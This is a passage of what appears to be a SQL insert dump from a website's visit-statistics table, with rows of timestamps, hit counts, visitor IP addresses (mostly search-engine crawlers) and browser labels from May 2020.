4.38','chrome'),(508812,1590530619,1,1,0,0,'66.249.70.72','chrome'),(508813,1590530990,3,3,0,0,'66.249.70.70','chrome'),(508814,1590531016,1,1,0,0,'157.55.39.211','other'),(508815,1590531349,2,2,0,0,'66.249.70.69','chrome'),(508816,1590531731,1,1,0,0,'66.249.64.38','chrome'),(508817,1590531923,4,4,0,0,'66.249.70.70','chrome'),(508818,1590531940,2,2,0,0,'66.249.64.36','chrome'),(508819,1590532001,1,1,0,0,'66.249.64.33','chrome'),(508820,1590532220,1,1,0,0,'46.243.145.134','firefox'),(508821,1590532290,1,1,0,0,'66.249.70.72','chrome'),(508822,1590533002,3,3,0,0,'66.249.70.69','chrome'),(508823,1590533199,4,4,0,0,'66.249.70.72','chrome'),(508824,1590533716,1,1,0,0,'66.249.64.38','chrome'),(508825,1590533958,1,1,0,0,'66.249.64.33','chrome'),(508826,1590534110,3,3,0,0,'66.249.70.70','chrome'),(508827,1590534351,8,8,0,0,'77.120.98.235','other'),(508828,1590535346,1,1,0,0,'66.249.64.38','chrome'),(508829,1590535617,1,1,0,0,'66.249.64.36','chrome'),(508830,1590535847,2,2,0,0,'66.249.70.69','chrome'),(508831,1590535858,2,2,0,0,'66.249.70.70','chrome'),(508832,1590536808,2,2,0,0,'66.249.70.72','chrome'),(508833,1590537307,1,1,0,0,'62.205.134.182','other'),(508834,1590537646,2,2,0,0,'66.249.70.69','chrome'),(508835,1590537736,3,3,0,0,'66.249.70.72','chrome'),(508836,1590537868,2,2,0,0,'8.29.198.25','other'),(508837,1590537995,1,1,0,0,'66.249.64.38','chrome'),(508838,1590538445,2,2,0,0,'66.249.70.70','chrome'),(508839,1590539014,2,2,0,0,'198.108.66.202','other'),(508840,1590539313,8,8,0,0,'77.120.98.235','other'),(508841,1590539434,1,1,0,0,'66.249.70.72','chrome'),(508842,1590539445,1,1,0,0,'66.249.70.70','chrome'),(508843,1590539879,1,1,0,0,'196.240.57.172','msie'),(508844,1590539996,1,1,0,0,'66.249.70.69','chrome'),(508845,1590540383,1,1,0,0,'66.249.64.33','chrome'),(508846,1590540884,3,3,0,0,'66.249.70.72','chrome'),(508847,1590541070,1,1,0,0,'13.66.139.0','other'),(508848,1590541233,1,1,0,0,'66.249.70.69','chrome'),(508849,1590541458,1,1,0,0,'66.249.64.38','chrome'),(508850,1590541812,1,1,0,0,'66.249.70.72','chrome'),(508851,1590541852,1,1,0,0,'66.249.70.70','chrome'),(508852,1590541862,1,1,0,0,'66.249.64.36','chrome'),(508853,1590542449,1,1,0,0,'13.66.139.0','other'),(508854,1590543054,2,2,0,0,'66.249.70.70','chrome'),(508855,1590543664,8,8,0,0,'77.120.98.235','other'),(508856,1590543729,1,1,0,0,'66.249.64.33','chrome'),(508857,1590543903,2,2,0,0,'66.249.70.72','chrome'),(508858,1590545006,1,1,0,0,'66.249.70.72','chrome'),(508859,1590545224,1,1,0,0,'66.249.70.69','chrome'),(508860,1590545635,2,2,0,0,'66.249.64.33','chrome'),(508861,1590545786,2,2,0,0,'66.249.70.70','chrome'),(508862,1590546886,1,1,0,0,'66.249.64.33','chrome'),(508863,1590547171,1,1,0,0,'66.249.64.38','chrome'),(508864,1590547394,2,2,0,0,'66.249.70.70','chrome'),(508865,1590547466,4,4,0,0,'66.249.70.69','chrome'),(508866,1590547678,5,5,0,0,'66.249.70.72','chrome'),(508867,1590548052,8,8,0,0,'77.120.98.235','other'),(508868,1590548699,1,1,0,0,'8.29.198.27','other'),(508869,1590548941,1,1,0,0,'8.29.198.25','other'),(508870,1590549273,2,2,0,0,'66.249.64.38','chrome'),(508871,1590549275,1,1,0,0,'66.249.64.36','chrome'),(508872,1590549336,1,1,0,0,'66.249.70.72','chrome'),(508873,1590550633,1,1,0,0,'66.249.70.69','chrome'),(508874,1590550778,2,2,0,0,'66.249.70.70','chrome'),(508875,1590551020,1,1,0,0,'66.249.64.33','chrome'),(508876,1590552000,1,1,0,0,'66.249.70.72','chrome'),(508877,1590552021,1,1,0,0,'66.249.70.70','chrome'),(508878,1590552452,1,1,0,0,'66.249.70.69','chrome'),(508879,1590552568,8,8,0,0,'77.120.98.235','other'),(508880,1590552941,1,1,0,0,'194.61.24.94','other'),(508881,1590552996,1,1,0,0,'66.249.70.70','chrome'),(508882,1590553020,1,1,0,0,'66.249.70.72','chrome'),(508883,1590553421,1,1,0,0,'17.58.99.7','other'),(508884,1590553969,3,3,0,0,'66.249.70.72','chrome'),(508885,1590554718,1,1,0,0,'66.249.70.69','chrome'),(508886,1590554981,1,1,0,0,'62.205.134.182','other'),(508887,1590556387,3,3,0,0,'66.249.70.70','chrome'),(508888,1590556441,1,1,0,0,'91.121.76.25','msie'),(508889,1590556502,1,1,0,0,'95.216.96.245','other'),(508890,1590556579,1,1,0,0,'157.55.39.123','other'),(508891,1590557070,2,2,0,0,'66.249.70.69','chrome'),(508892,1590557656,1,1,0,0,'157.55.39.91','other'),(508893,1590557789,8,8,0,0,'77.120.98.235','other'),(508894,1590558463,1,1,0,0,'95.216.96.245','other'),(508895,1590559028,1,1,0,0,'66.249.70.69','chrome'),(508896,1590559368,1,1,0,0,'95.216.96.245','other'),(508897,1590559390,1,1,0,0,'66.249.64.33','chrome'),(508898,1590559523,2,2,0,0,'8.29.198.25','other'),(508899,1590559621,1,1,0,0,'17.58.99.7','other'),(508900,1590559729,1,1,0,0,'66.249.70.70','chrome'),(508901,1590560817,3,3,0,0,'66.249.70.70','chrome'),(508902,1590561050,1,1,0,0,'68.183.33.11','chrome'),(508903,1590561155,1,1,0,0,'66.249.64.33','chrome'),(508904,1590561971,1,1,0,0,'66.249.70.69','chrome'),(508905,1590562617,1,1,0,0,'17.58.99.7','other'),(508906,1590562678,2,2,0,0,'66.249.70.72','chrome'),(508907,1590562903,2,2,0,0,'66.249.70.70','chrome'),(508908,1590562914,1,1,0,0,'66.249.64.36','chrome'),(508909,1590563240,3,3,0,0,'66.249.70.69','chrome'),(508910,1590563754,2,2,0,0,'178.92.153.201','chrome'),(508911,1590563796,8,8,0,0,'77.120.98.235','other'),(508912,1590564119,1,1,0,0,'157.55.39.211','other'),(508913,1590564825,1,1,0,0,'131.220.6.152','chrome'),(508914,1590564860,1,1,0,0,'66.249.70.69','chrome'),(508915,1590567427,2,2,0,0,'66.249.70.72','chrome'),(508916,1590567446,5,5,0,0,'66.249.70.69','chrome'),(508917,1590567465,1,1,0,0,'66.249.64.38','chrome'),(508918,1590567737,1,1,0,0,'157.55.39.123','other'),(508919,1590567767,1,1,0,0,'82.207.91.234','chrome'),(508920,1590567906,1,1,0,0,'91.196.178.8','chrome'),(508921,1590567936,1,1,0,0,'66.249.70.70','chrome'),(508922,1590567942,1,1,0,0,'91.196.178.8','other'),(508923,1590568117,1,1,0,0,'46.211.25.27','chrome'),(508924,1590568119,1,1,0,0,'37.55.57.236','chrome'),(508925,1590568299,2,2,0,0,'157.55.39.91','other'),(508926,1590568595,1,1,0,0,'66.249.70.72','chrome'),(508927,1590568641,1,1,0,0,'157.55.39.211','other'),(508928,1590568830,1,1,0,0,'66.249.64.33','chrome'),(508929,1590569012,3,3,0,0,'66.249.70.69','chrome'),(508930,1590569442,1,1,0,0,'213.180.203.95','other'),(508931,1590569750,1,1,0,0,'213.180.203.122','other'),(508932,1590569962,1,1,0,0,'91.196.179.134','chrome'),(508933,1590570324,1,1,0,0,'66.249.70.70','chrome'),(508934,1590570352,1,1,0,0,'8.29.198.27','other'),(508935,1590570596,1,1,0,0,'8.29.198.25','other'),(508936,1590570764,1,1,0,0,'213.180.203.146','other'),(508937,1590570867,2,2,0,0,'3.17.24.70','chrome'),(508938,1590570946,1,1,0,0,'66.249.70.72','chrome'),(508939,1590571212,2,2,0,0,'66.249.70.69','chrome'),(508940,1590571417,1,0,1,0,'66.249.70.70',''),(508941,1590571431,1,1,0,0,'17.58.99.7','other'),(508942,1590571579,1,1,0,0,'178.154.200.175','other'),(508943,1590571586,8,8,0,0,'77.120.98.235','other'),(508944,1590571961,1,1,0,0,'66.249.70.72','chrome'),(508945,1590572280,1,1,0,0,'157.55.39.91','other'),(508946,1590572386,1,1,0,0,'178.154.200.106','other'),(508947,1590572457,2,2,0,0,'66.249.64.33','chrome'),(508948,1590573073,2,2,0,0,'66.249.70.70','chrome'),(508949,1590573097,1,1,0,0,'66.249.64.36','chrome'),(508950,1590573206,1,1,0,0,'17.58.99.7','other'),(508951,1590573278,1,1,0,0,'66.249.70.72','chrome'),(508952,1590573626,1,1,0,0,'213.180.203.140','other'),(508953,1590573987,1,1,0,0,'85.10.201.122','chrome'),(508954,1590574074,1,1,0,0,'193.201.98.78','chrome'),(508955,1590574277,1,1,0,0,'178.154.200.8','other'),(508956,1590574418,1,1,0,0,'66.249.70.72','chrome'),(508957,1590574480,1,1,0,0,'178.154.200.2','other'),(508958,1590574793,1,1,0,0,'157.55.39.227','other'),(508959,1590574822,1,1,0,0,'66.249.64.33','chrome'),(508960,1590574867,1,1,0,0,'213.180.203.34','other'),(508961,1590575059,1,1,0,0,'176.122.120.210','chrome'),(508962,1590575088,1,1,0,0,'66.249.64.36','chrome'),(508963,1590575233,2,2,0,0,'66.249.70.69','chrome'),(508964,1590575350,1,1,0,0,'3.16.82.6','chrome'),(508965,1590575437,1,1,0,0,'178.154.200.131','other'),(508966,1590575956,1,1,0,0,'157.55.39.123','other'),(508967,1590576194,1,1,0,0,'66.249.64.36','chrome'),(508968,1590576817,1,1,0,0,'157.55.39.211','other'),(508969,1590576962,1,1,0,0,'66.249.64.38','chrome'),(508970,1590576996,1,1,0,0,'17.58.99.7','other'),(508971,1590577173,2,2,0,0,'66.249.70.70','chrome'),(508972,1590577565,1,1,0,0,'157.55.39.205','other'),(508973,1590577620,1,1,0,0,'213.180.203.70','other'),(508974,1590577675,2,2,0,0,'95.213.141.126','opera'),(508975,1590577975,1,1,0,0,'157.55.39.123','other'),(508976,1590578198,1,1,0,0,'109.74.154.72','chrome'),(508977,1590578676,1,1,0,0,'66.249.70.70','chrome'),(508978,1590578738,2,2,0,0,'66.249.70.72','chrome'),(508979,1590578841,1,1,0,0,'66.249.70.69','chrome'),(508980,1590579179,1,1,0,0,'66.249.64.38','chrome'),(508981,1590579356,1,1,0,0,'92.112.124.180','chrome'),(508982,1590580730,1,1,0,0,'66.249.70.70','chrome'),(508983,1590580811,1,1,0,0,'91.196.178.70','chrome'),(508984,1590580901,2,2,0,0,'66.249.70.72','chrome'),(508985,1590580957,1,1,0,0,'157.55.39.205','other'),(508986,1590581187,1,1,0,0,'8.29.198.27','other'),(508987,1590581245,8,8,0,0,'77.120.98.235','other'),(508988,1590581431,1,1,0,0,'8.29.198.26','other'),(508989,1590581433,2,2,0,0,'66.249.64.36','chrome'),(508990,1590581633,1,1,0,0,'17.58.99.7','other'),(508991,1590581731,1,1,0,0,'5.227.15.25','chrome'),(508992,1590581893,1,1,0,0,'209.17.96.18','other'),(508993,1590581955,1,1,0,0,'157.55.39.124','other'),(508994,1590581996,1,1,0,0,'157.55.39.205','other'),(508995,1590582071,1,1,0,0,'91.196.178.81','chrome'),(508996,1590582104,1,1,0,0,'66.249.64.38','chrome'),(508997,1590582213,1,1,0,0,'213.180.203.17','other'),(508998,1590582232,1,1,0,0,'198.108.66.16','other'),(508999,1590582346,1,1,0,0,'157.55.39.123','other'),(509000,1590582678,2,2,0,0,'66.249.70.72','chrome'),(509001,1590582769,1,1,0,0,'66.249.64.36','chrome'),(509002,1590582925,1,1,0,0,'178.154.200.45','other'),(509003,1590583064,2,2,0,0,'143.215.247.111','chrome'),(509004,1590583071,1,1,0,0,'66.249.70.70','chrome'),(509005,1590584068,2,2,0,0,'66.249.64.33','chrome'),(509006,1590584423,1,1,0,0,'17.58.99.7','other'),(509007,1590585223,1,1,0,0,'66.249.70.70','chrome'),(509008,1590585253,2,2,0,0,'66.249.64.38','chrome'),(509009,1590585409,1,1,0,0,'157.55.39.211','other'),(509010,1590585515,1,1,0,0,'157.55.39.205','other'),(509011,1590585694,1,1,0,0,'178.154.200.220','other'),(509012,1590585869,3,3,0,0,'66.249.70.69','chrome'),(509013,1590586052,1,1,0,0,'178.154.200.222','other'),(509014,1590586059,2,2,0,0,'157.55.39.123','other'),(509015,1590586084,1,1,0,0,'157.55.39.124','other'),(509016,1590587755,1,1,0,0,'66.249.70.69','chrome'),(509017,1590587773,2,2,0,0,'157.55.39.205','other'),(509018,1590587863,2,2,0,0,'91.196.178.85','firefox'),(509019,1590588705,1,1,0,0,'91.196.178.72','chrome'),(509020,1590589914,1,1,0,0,'157.55.39.124','other'),(509021,1590590046,1,1,0,0,'66.249.70.72','chrome'),(509022,1590590420,1,1,0,0,'66.249.70.69','chrome'),(509023,1590590839,1,1,0,0,'91.196.178.80','chrome'),(509024,1590591820,2,2,0,0,'213.108.42.21','chrome'),(509025,1590591932,1,1,0,0,'66.249.70.69','chrome'),(509026,1590592017,1,1,0,0,'8.29.198.26','other'),(509027,1590592264,1,1,0,0,'8.29.198.25','other'),(509028,1590592397,1,1,0,0,'178.154.200.92','other'),(509029,1590592487,1,1,0,0,'198.108.66.161','other'),(509030,1590592834,1,1,0,0,'66.249.64.38','chrome'),(509031,1590592978,1,1,0,0,'213.108.42.21','chrome'),(509032,1590593116,1,1,0,0,'66.249.70.70','chrome'),(509033,1590593129,8,8,0,0,'77.120.98.235','other'),(509034,1590594236,1,1,0,0,'157.55.39.211','other'),(509035,1590594928,1,1,0,0,'157.55.39.124','other'),(509036,1590594984,2,2,0,0,'66.249.70.70','chrome'),(509037,1590595223,1,1,0,0,'66.249.70.72','chrome'),(509038,1590595295,1,1,0,0,'66.249.64.38','chrome'),(509039,1590595560,1,1,0,0,'66.249.70.69','chrome'),(509040,1590596133,1,1,0,0,'66.249.70.72','chrome'),(509041,1590596497,1,1,0,0,'157.55.39.147','other'),(509042,1590597112,2,2,0,0,'66.249.70.72','chrome'),(509043,1590597158,1,1,0,0,'17.58.99.7','other'),(509044,1590597906,1,1,0,0,'82.207.116.83','chrome'),(509045,1590597965,1,1,0,0,'66.249.70.69','chrome'),(509046,1590598245,1,1,0,0,'157.55.39.124','other'),(509047,1590601043,2,2,0,0,'157.55.39.124','other'),(509048,1590601067,1,1,0,0,'17.58.99.7','other'),(509049,1590601307,1,1,0,0,'91.196.178.21','chrome'),(509050,1590602366,1,1,0,0,'66.249.64.33','chrome'),(509051,1590602668,1,1,0,0,'213.180.203.22','other'),(509052,1590602845,2,2,0,0,'8.29.198.26','other'),(509053,1590602977,1,1,0,0,'195.88.158.190','chrome'),(509054,1590603275,1,1,0,0,'94.178.147.163','chrome'),(509055,1590603796,1,1,0,0,'37.73.110.107','chrome'),(509056,1590604207,1,1,0,0,'66.249.64.33','chrome'),(509057,1590604521,1,1,0,0,'196.240.57.172','opera'),(509058,1590604550,1,1,0,0,'157.55.39.147','other'),(509059,1590604666,2,2,0,0,'5.9.151.57','other'),(509060,1590605850,8,8,0,0,'77.120.98.235','other'),(509061,1590606478,1,1,0,0,'66.249.70.69','chrome'),(509062,1590606593,1,1,0,0,'66.249.70.70','chrome'),(509063,1590607696,1,1,0,0,'66.249.70.72','chrome'),(509064,1590607744,8,8,0,0,'77.120.98.235','other'),(509065,1590607859,1,1,0,0,'66.249.70.70','chrome'),(509066,1590608678,1,1,0,0,'13.66.139.0','other'),(509067,1590609230,1,1,0,0,'178.154.200.222','other'),(509068,1590609463,1,1,0,0,'51.15.25.13','firefox'),(509069,1590609807,1,1,0,0,'66.249.70.70','chrome'),(509070,1590609890,1,1,0,0,'46.48.13.161','chrome'),(509071,1590610075,1,1,0,0,'157.55.39.147','other'),(509072,1590610135,8,8,0,0,'77.120.98.235','other'),(509073,1590611095,2,2,0,0,'157.55.39.147','other'),(509074,1590612379,1,1,0,0,'104.36.18.178','chrome'),(509075,1590612565,8,8,0,0,'77.120.98.235','other'),(509076,1590613559,2,2,0,0,'66.249.70.72','chrome'),(509077,1590613576,8,8,0,0,'77.87.41.217','other'),(509078,1590613679,1,1,0,0,'8.29.198.27','other'),(509079,1590613915,1,1,0,0,'8.29.198.25','other'),(509080,1590614199,1,1,0,0,'207.46.13.232','other'),(509081,1590614231,1,1,0,0,'66.249.64.38','chrome'),(509082,1590614243,1,1,0,0,'91.196.178.187','chrome'),(509083,1590614836,8,8,0,0,'77.120.98.235','other'),(509084,1590615471,1,1,0,0,'62.210.82.198','firefox'),(509085,1590615645,2,2,0,0,'207.46.13.232','other'),(509086,1590616612,1,1,0,0,'66.249.70.69','chrome'),(509087,1590617123,8,8,0,0,'77.120.98.235','other'),(509088,1590617578,1,1,0,0,'77.87.41.154','other'),(509089,1590617582,7,7,0,0,'77.87.41.193','other'),(509090,1590617625,1,1,0,0,'17.58.99.7','other'),(509091,1590617817,1,1,0,0,'178.154.200.222','other'),(509092,1590618079,3,3,0,0,'66.249.70.70','chrome'),(509093,1590618507,1,1,0,0,'66.249.70.72','chrome'),(509094,1590619379,8,8,0,0,'77.120.98.235','other'),(509095,1590619574,1,1,0,0,'207.46.13.229','other'),(509096,1590620152,2,2,0,0,'178.154.200.222','other'),(509097,1590621449,1,1,0,0,'17.58.99.7','other'),(509098,1590621572,8,8,0,0,'77.120.98.235','other'),(509099,1590621629,2,2,0,0,'207.46.13.229','other'),(509100,1590621822,1,1,0,0,'66.249.64.36','chrome'),(509101,1590621887,1,1,0,0,'46.4.33.48','other'),(509102,1590621994,1,1,0,0,'66.249.70.69','chrome'),(509103,1590622080,1,1,0,0,'66.249.70.72','chrome'),(509104,1590622550,1,1,0,0,'66.249.70.70','chrome'),(509105,1590623705,1,1,0,0,'62.205.134.182','other'),(509106,1590623878,1,1,0,0,'17.58.99.7','other'),(509107,1590624028,8,8,0,0,'77.120.98.235','other'),(509108,1590624507,1,1,0,0,'8.29.198.27','other'),(509109,1590624741,1,1,0,0,'8.29.198.26','other'),(509110,1590625055,1,1,0,0,'66.249.64.38','chrome'),(509111,1590625487,1,1,0,0,'66.249.70.69','chrome'),(509112,1590625573,1,1,0,0,'66.249.70.70','chrome'),(509113,1590626495,8,8,0,0,'77.120.98.235','other'),(509114,1590626802,2,1,1,0,'66.249.70.70',''),(509115,1590627169,1,1,0,0,'207.46.13.232','other'),(509116,1590627295,1,1,0,0,'207.46.13.229','other'),(509117,1590627782,1,1,0,0,'213.180.203.16','other'),(509118,1590627991,1,1,0,0,'66.249.64.38','chrome'),(509119,1590628068,1,1,0,0,'66.249.70.69','chrome'),(509120,1590628820,8,8,0,0,'77.120.98.235','other'),(509121,1590629194,1,1,0,0,'207.46.13.68','other'),(509122,1590629479,1,1,0,0,'66.249.70.69','chrome'),(509123,1590631005,1,1,0,0,'66.249.70.72','chrome'),(509124,1590631013,8,8,0,0,'77.120.98.235','other'),(509125,1590631309,1,1,0,0,'207.46.13.162','other'),(509126,1590631427,1,1,0,0,'66.249.70.69','chrome'),(509127,1590631489,1,1,0,0,'66.249.64.33','chrome'),(509128,1590631657,1,1,0,0,'66.249.70.70','chrome'),(509129,1590632418,1,1,0,0,'194.61.24.94','other'),(509130,1590632858,1,1,0,0,'66.249.70.69','chrome'),(509131,1590633221,8,8,0,0,'77.120.98.235','other'),(509132,1590635177,1,1,0,0,'207.46.13.229','other'),(509133,1590635335,2,2,0,0,'8.29.198.27','other'),(509134,1590635368,8,8,0,0,'77.120.98.235','other'),(509135,1590635834,1,1,0,0,'17.58.99.7','other'),(509136,1590635898,2,2,0,0,'66.249.70.72','chrome'),(509137,1590636326,1,1,0,0,'213.180.203.16','other'),(509138,1590636350,1,1,0,0,'178.154.200.222','other'),(509139,1590636388,1,1,0,0,'66.249.64.33','chrome'),(509140,1590636455,1,1,0,0,'66.249.70.70','chrome'),(509141,1590636560,1,1,0,0,'66.249.64.38','chrome'),(509142,1590637106,1,1,0,0,'207.46.13.68','other'),(509143,1590637513,1,1,0,0,'178.154.200.245','other'),(509144,1590637523,1,1,0,0,'178.154.200.222','other'),(509145,1590637564,8,8,0,0,'77.120.98.235','other'),(509146,1590637823,1,1,0,0,'17.58.99.7','other'),(509147,1590638144,1,1,0,0,'66.249.70.69','chrome'),(509148,1590638441,1,1,0,0,'213.180.203.70','other'),(509149,1590639298,1,1,0,0,'47.108.80.103','firefox'),(509150,1590639745,1,1,0,0,'40.71.251.111','chrome'),(509151,1590639842,8,8,0,0,'77.120.98.235','other'),(509152,1590640422,1,0,1,0,'66.249.70.72',''),(509153,1590640423,1,1,0,0,'66.249.70.70','chrome'),(509154,1590640734,1,1,0,0,'17.58.99.7','other'),(509155,1590641070,1,1,0,0,'66.249.70.69','chrome'),(509156,1590641169,1,1,0,0,'40.71.251.111','chrome'),(509157,1590641361,1,1,0,0,'62.205.134.182','other'),(509158,1590641777,1,1,0,0,'213.180.203.16','other'),(509159,1590641809,1,1,0,0,'66.249.64.33','chrome'),(509160,1590642101,8,8,0,0,'77.120.98.235','other'),(509161,1590642519,2,2,0,0,'66.249.70.69','chrome'),(509162,1590642701,1,1,0,0,'207.46.13.162','other'),(509163,1590643102,1,1,0,0,'178.159.37.88','chrome'),(509164,1590643776,1,1,0,0,'66.249.70.69','chrome'),(509165,1590644337,8,8,0,0,'77.120.98.235','other'),(509166,1590644730,1,1,0,0,'207.46.13.68','other'),(509167,1590644785,1,1,0,0,'17.58.99.7','other'),(509168,1590644877,1,1,0,0,'91.124.50.129','chrome'),(509169,1590645053,1,1,0,0,'66.249.70.69','chrome'),(509170,1590645123,1,1,0,0,'178.154.200.175','other'),(509171,1590645571,1,1,0,0,'66.249.70.72','chrome'),(509172,1590646151,1,1,0,0,'157.55.39.115','other'),(509173,1590646167,1,1,0,0,'91.196.177.46','chrome'),(509174,1590646169,1,1,0,0,'8.29.198.27','other'),(509175,1590646395,1,1,0,0,'8.29.198.26','other'),(509176,1590646546,8,8,0,0,'77.120.98.235','other'),(509177,1590646581,1,1,0,0,'178.154.200.245','other'),(509178,1590646828,1,1,0,0,'66.249.64.36','chrome'),(509179,1590646842,1,1,0,0,'159.89.207.86','msie'),(509180,1590647211,1,1,0,0,'17.58.99.7','other'),(509181,1590647386,1,1,0,0,'66.102.9.169','chrome'),(509182,1590647797,2,2,0,0,'66.249.70.70','chrome'),(509183,1590648460,1,1,0,0,'46.133.178.103','other'),(509184,1590648757,1,1,0,0,'66.249.64.38','chrome'),(509185,1590648773,8,8,0,0,'77.120.98.235','other'),(509186,1590649111,2,2,0,0,'66.249.70.70','chrome'),(509187,1590649573,1,1,0,0,'91.196.177.46','chrome'),(509188,1590650215,1,1,0,0,'17.58.99.7','other'),(509189,1590650316,1,1,0,0,'95.67.72.70','chrome'),(509190,1590650346,1,1,0,0,'91.196.178.167','chrome'),(509191,1590650347,1,1,0,0,'66.249.70.72','chrome'),(509192,1590650589,2,2,0,0,'66.249.70.69','chrome'),(509193,1590650707,1,1,0,0,'207.46.13.91','other'),(509194,1590650962,8,8,0,0,'77.120.98.235','other'),(509195,1590651231,1,1,0,0,'131.220.6.152','chrome'),(509196,1590652305,2,1,1,0,'66.249.64.36',''),(509197,1590652720,1,1,0,0,'66.249.70.72','chrome'),(509198,1590653070,1,1,0,0,'207.46.13.91','other'),(509199,1590653183,8,8,0,0,'77.120.98.235','other'),(509200,1590653547,1,1,0,0,'185.34.224.10','chrome'),(509201,1590653943,1,1,0,0,'95.132.50.157','chrome'),(509202,1590654101,1,1,0,0,'66.249.70.72','chrome'),(509203,1590654533,1,1,0,0,'66.249.70.69','chrome'),(509204,1590654744,1,1,0,0,'198.16.70.29','chrome'),(509205,1590654760,1,1,0,0,'185.34.224.10','chrome'),(509206,1590654773,1,1,0,0,'66.249.64.33','chrome'),(509207,1590654814,1,1,0,0,'66.102.9.167','chrome'),(509208,1590655012,1,1,0,0,'95.133.238.58','chrome'),(509209,1590655166,2,1,1,0,'66.249.70.70',''),(509210,1590655505,8,8,0,0,'77.120.98.235','other'),(509211,1590655684,1,1,0,0,'185.34.224.10','chrome'),(509212,1590656090,2,2,0,0,'66.249.70.69','chrome'),(509213,1590656144,1,1,0,0,'66.249.70.70','chrome'),(509214,1590656827,2,2,0,0,'62.210.139.12','chrome'),(509215,1590656828,2,2,0,0,'62.210.177.44','chrome'),(509216,1590656999,2,2,0,0,'8.29.198.26','other'),(509217,1590657124,1,1,0,0,'82.207.91.234','chrome'),(509218,1590657156,1,1,0,0,'66.249.64.36','chrome'),(509219,1590657211,1,1,0,0,'95.132.50.157','chrome'),(509220,1590657746,8,8,0,0,'77.120.98.235','other'),(509221,1590657966,1,1,0,0,'37.115.159.91','chrome'),(509222,1590658442,1,1,0,0,'66.249.70.70','chrome'),(509223,1590658639,1,1,0,0,'3.133.115.239','chrome'),(509224,1590658964,1,1,0,0,'88.155.184.214','chrome'),(509225,1590659247,1,1,0,0,'66.249.70.69','chrome'),(509226,1590659344,1,1,0,0,'66.249.64.36','chrome'),(509227,1590659535,1,1,0,0,'207.46.13.160','other'),(509228,1590659537,2,2,0,0,'207.46.13.91','other'),(509229,1590659852,1,1,0,0,'37.115.159.91','chrome'),(509230,1590660152,8,8,0,0,'77.120.98.235','other'),(509231,1590660226,2,2,0,0,'66.249.64.38','chrome'),(509232,1590660658,1,1,0,0,'66.249.70.70','chrome'),(509233,1590660687,1,1,0,0,'66.249.70.69','chrome'),(509234,1590660808,1,1,0,0,'17.58.99.7','other'),(509235,1590661053,2,2,0,0,'207.46.13.160','other'),(509236,1590662386,1,1,0,0,'66.249.70.69','chrome'),(509237,1590662424,1,1,0,0,'66.249.70.72','chrome'),(509238,1590662489,8,8,0,0,'77.120.98.235','other'),(509239,1590663066,1,1,0,0,'17.58.99.7','other'),(509240,1590663111,1,1,0,0,'207.46.13.91','other'),(509241,1590663959,2,2,0,0,'66.249.70.69','chrome'),(509242,1590664090,3,3,0,0,'157.55.39.219','other'),(509243,1590664356,1,1,0,0,'207.46.13.91','other'),(509244,1590664484,1,1,0,0,'207.46.13.160','other'),(509245,1590664647,1,1,0,0,'31.13.127.14','other'),(509246,1590664826,8,8,0,0,'77.120.98.235','other'),(509247,1590664936,1,1,0,0,'109.74.154.72','chrome'),(509248,1590665178,2,2,0,0,'66.249.70.70','chrome'),(509249,1590665993,1,1,0,0,'66.249.70.69','chrome'),(509250,1590666232,1,1,0,0,'91.196.178.180','chrome'),(509251,1590666420,1,1,0,0,'207.46.13.160','other'),(509252,1590666499,1,1,0,0,'157.55.39.219','other'),(509253,1590667158,8,8,0,0,'77.120.98.235','other'),(509254,1590667160,1,1,0,0,'91.196.178.186','chrome'),(509255,1590667306,1,1,0,0,'91.196.178.134','chrome'),(509256,1590667413,2,2,0,0,'66.249.70.70','chrome'),(509257,1590667825,1,1,0,0,'8.29.198.26','other'),(509258,1590668043,1,1,0,0,'8.29.198.25','other'),(509259,1590668287,1,1,0,0,'188.163.19.57','firefox'),(509260,1590668582,1,1,0,0,'198.108.66.80','other'),(509261,1590669010,1,1,0,0,'91.196.178.134','chrome'),(509262,1590669014,1,1,0,0,'66.249.70.69','chrome'),(509263,1590669015,1,0,1,0,'66.249.70.70',''),(509264,1590669361,1,1,0,0,'207.46.13.160','other'),(509265,1590669457,1,1,0,0,'207.46.13.91','other'),(509266,1590669605,8,8,0,0,'77.120.98.235','other'),(509267,1590669654,1,1,0,0,'54.153.62.208','chrome'),(509268,1590669823,1,1,0,0,'157.55.39.219','other'),(509269,1590669842,1,1,0,0,'66.249.64.38','chrome'),(509270,1590669933,1,1,0,0,'91.196.178.152','chrome'),(509271,1590670436,1,0,1,0,'66.249.70.72',''),(509272,1590670811,2,2,0,0,'207.46.13.160','other'),(509273,1590671684,3,3,0,0,'66.249.70.70','chrome'),(509274,1590671756,1,1,0,0,'94.242.54.22','chrome'),(509275,1590671836,1,1,0,0,'207.46.13.91','other'),(509276,1590671875,1,1,0,0,'138.246.253.10','chrome'),(509277,1590672697,1,1,0,0,'157.55.39.73','other'),(509278,1590673497,1,1,0,0,'207.46.13.9','other'),(509279,1590673533,1,1,0,0,'88.155.1.229','chrome'),(509280,1590673804,1,1,0,0,'66.249.70.70','chrome'),(509281,1590674408,8,8,0,0,'77.120.98.235','other'),(509282,1590674926,1,1,0,0,'207.46.13.160','other'),(509283,1590675552,1,1,0,0,'83.220.239.179','chrome'),(509284,1590676752,8,8,0,0,'77.120.98.235','other'),(509285,1590677205,1,1,0,0,'37.115.159.91','chrome'),(509286,1590677223,1,1,0,0,'207.46.13.160','other'),(509287,1590677294,1,1,0,0,'66.249.70.70','chrome'),(509288,1590678173,1,1,0,0,'157.55.39.73','other'),(509289,1590678377,1,1,0,0,'198.108.66.64','other'),(509290,1590678449,1,1,0,0,'66.249.70.69','chrome'),(509291,1590678661,1,1,0,0,'8.29.198.26','other'),(509292,1590678869,1,1,0,0,'8.29.198.27','other'),(509293,1590679063,1,1,0,0,'37.115.159.91','chrome'),(509294,1590679138,8,8,0,0,'77.120.98.235','other'),(509295,1590679366,1,1,0,0,'207.46.13.9','other'),(509296,1590680881,1,1,0,0,'37.115.159.91','chrome'),(509297,1590681492,1,1,0,0,'207.46.13.9','other'),(509298,1590681579,8,8,0,0,'77.120.98.235','other'),(509299,1590681702,1,1,0,0,'66.249.70.69','chrome'),(509300,1590682190,2,2,0,0,'92.253.204.195','msie'),(509301,1590682690,1,1,0,0,'37.115.159.91','chrome'),(509302,1590682826,2,2,0,0,'157.55.39.73','other'),(509303,1590683026,1,1,0,0,'207.46.13.9','other'),(509304,1590683947,1,1,0,0,'66.249.64.36','chrome'),(509305,1590683970,8,8,0,0,'77.120.98.235','other'),(509306,1590685300,1,1,0,0,'66.249.70.69','chrome'),(509307,1590686362,8,8,0,0,'77.120.98.235','other'),(509308,1590686556,1,1,0,0,'91.196.178.87','chrome'),(509309,1590687821,1,1,0,0,'91.196.178.153','chrome'),(509310,1590